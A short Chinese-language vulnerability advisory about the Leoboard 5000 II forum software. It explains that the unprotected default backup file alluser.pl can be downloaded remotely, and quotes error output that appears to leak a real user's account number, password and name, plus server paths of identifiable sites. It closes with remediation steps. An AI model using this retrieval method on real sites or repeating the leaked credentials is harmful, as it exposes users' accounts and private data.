雷傲论坛(Leoboard 5000 II)存在安全漏洞



漏洞描述： 

　 雷傲论坛是著名的CGI站点（CGIer.com）的产品，被国内很多知名站点采用。 



　 用户备份文件，缺省为“backup/alluser.pl”，其中存储所有注册用户的帐号密码等信息。由于缺省状态下没有任何安全保护措施，导致远程攻击者获得全部或者部分注册用户的敏感信息。 



　 例如：输入“http://www.notfound.org/lb5000/cgi-bin/backup/alluser.pl”， 可能会直接下载文件或者得到如下返回信息： 



　 CGI Error 

　 The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 



　 Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "7456.cgi" 

(Missing operator before cgi?) 

　 Number found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "cgi 7456" 

(Do you need to predeclare cgi?) 

　 Number found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "7456 226275" 

(Missing operator before 226275?) 

　 Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "226275 Member" 

(Missing operator before Member?) 

　 Bareword found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl line 1, near "3 wugang" 

(Missing operator before wugang?) 

　 Array found where operator expected at D:\grzy\musa\bbs\cgi-bin\backup\alluser.pl li 



　 从上面的信息可以看出帐号为“6456”，密码为“226275”，名字叫“吴刚”，呵呵。。。 



　 在特定情况下，也可能导致物理路径泄露： 



　 'E:\Inetpub\wwwroot\china918.net\lb5000\cgi-bin\backup\alluser.pl' script produced no output 



　 或者为： 



　 CGI Error 

　 The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 

　 Can't open perl script "e:\4esystem\wwwroot\stores\wwwfox\cgi-bin\backup\alluser.pl": No such file or directory 



解决方案： 

　 1.限制对该文件的访问

　 2.把该文件改为比较难猜的名字